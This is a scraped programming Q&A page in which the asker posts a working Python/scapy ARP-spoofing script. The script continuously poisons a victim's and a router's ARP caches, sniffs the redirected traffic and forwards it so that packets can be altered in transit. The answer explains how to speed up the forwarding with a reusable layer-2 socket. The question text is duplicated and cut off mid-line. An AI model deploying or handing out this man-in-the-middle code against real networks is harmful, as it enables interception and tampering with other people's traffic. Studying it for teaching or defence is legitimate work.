patternpythonMinor
Speeding up forwarding of Ethernet frames in Python ARP spoof
Viewed 0 times
arpethernetpythonframesforwardingspeedingspoof
Problem
I've followed a few tutorials on ARP Spoofing with Python/scapy. They all suggest activating the OS IP Forwarding in Linux:
This worked fine for me but has the disadvantage that I can't tamper with packets. Since I will need to demonstrate modifying a packet before sending it along I need to handle the forwarding myself. I came up with this:
```
from scapy.all import *
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from threading import Thread
import time
victim_ip = '192.168.0.2'
victim_mac = 'b0:34:95:ee:ee:b6'
router_ip = '192.168.0.1'
router_mac = 'C0:3E:0F:29:4F:EC'
attack_ip = '192.168.0.10'
attack_mac = '08:00:27:80:bd:26'
poison_timer = .1
def monitor_callback(pkt):
# Only handle IP Layer packets
if IP in pkt:
# Forward packets from the victim to the router
if pkt[Ether].src == victim_mac:
pkt[Ether].dst = router_mac
pkt[Ether].src = attack_mac
sendp(fragment(pkt), verbose=0)
# Packets destined to the victim are forwarded
elif pkt[IP].dst == victim_ip:
pkt[Ether].dst = victim_mac
pkt[Ether].src = attack_mac
sendp(fragment(pkt), verbose=0)
class monitor_incoming(Thread):
def __init__(self):
Thread.__init__(self)
def run(self):
sniff(prn=monitor_callback, filter="ip", store=0)
class poison(Thread):
def __init__(self):
Thread.__init__(self)
def run(self):
# Tell the victim 'router_ip is at attack_mac'
router_is_at = ARP(op=2, psrc=router_ip, pdst=victim_ip, hwdst=attack_mac)
# Tell the router 'victim_ip is at attack_mac'
victim_is_at = ARP(op=2, psrc=victim_ip, pdst=router_ip, hwdst=attack_mac)
while True:
send(router_is_at, verbose=0)
send(victim_is_at, verbose=0)
time.sleep(poison_timer)
if __name__ == '__main__':
monitor_incoming = monitor_incoming()
monit
echo 1 > /proc/sys/net/ipv4/ip_forwardThis worked fine for me but has the disadvantage that I can't tamper with packets. Since I will need to demonstrate modifying a packet before sending it along I need to handle the forwarding myself. I came up with this:
```
from scapy.all import *
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from threading import Thread
import time
victim_ip = '192.168.0.2'
victim_mac = 'b0:34:95:ee:ee:b6'
router_ip = '192.168.0.1'
router_mac = 'C0:3E:0F:29:4F:EC'
attack_ip = '192.168.0.10'
attack_mac = '08:00:27:80:bd:26'
poison_timer = .1
def monitor_callback(pkt):
# Only handle IP Layer packets
if IP in pkt:
# Forward packets from the victim to the router
if pkt[Ether].src == victim_mac:
pkt[Ether].dst = router_mac
pkt[Ether].src = attack_mac
sendp(fragment(pkt), verbose=0)
# Packets destined to the victim are forwarded
elif pkt[IP].dst == victim_ip:
pkt[Ether].dst = victim_mac
pkt[Ether].src = attack_mac
sendp(fragment(pkt), verbose=0)
class monitor_incoming(Thread):
def __init__(self):
Thread.__init__(self)
def run(self):
sniff(prn=monitor_callback, filter="ip", store=0)
class poison(Thread):
def __init__(self):
Thread.__init__(self)
def run(self):
# Tell the victim 'router_ip is at attack_mac'
router_is_at = ARP(op=2, psrc=router_ip, pdst=victim_ip, hwdst=attack_mac)
# Tell the router 'victim_ip is at attack_mac'
victim_is_at = ARP(op=2, psrc=victim_ip, pdst=router_ip, hwdst=attack_mac)
while True:
send(router_is_at, verbose=0)
send(victim_is_at, verbose=0)
time.sleep(poison_timer)
if __name__ == '__main__':
monitor_incoming = monitor_incoming()
monit
Solution
I had the same problem. You need to set up a reusable
It is much faster. Here you can see how to do it:
https://home.regit.org/2014/04/speeding-up-scapy-packets-sending/
The diff/change from using a normal sendp looks like this:
scapy.L2socket socket and call send(pkt) on it, instead of using sendp.It is much faster. Here you can see how to do it:
https://home.regit.org/2014/04/speeding-up-scapy-packets-sending/
The diff/change from using a normal sendp looks like this:
@@ -27,6 +27,7 @@ class replay:
def run(self):
# open filename
filedesc = open(self.filename, 'r')
+ s = conf.L2socket(iface=self.iface)
# loop on read line
for line in filedesc:
# Build and send packet
- sendp(pkt, iface = self.iface, verbose = verbose)
+ s.send(pkt)Code Snippets
@@ -27,6 +27,7 @@ class replay:
def run(self):
# open filename
filedesc = open(self.filename, 'r')
+ s = conf.L2socket(iface=self.iface)
# loop on read line
for line in filedesc:
# Build and send packet
- sendp(pkt, iface = self.iface, verbose = verbose)
+ s.send(pkt)Context
StackExchange Code Review Q#68016, answer score: 3
Revisions (0)
No revisions yet.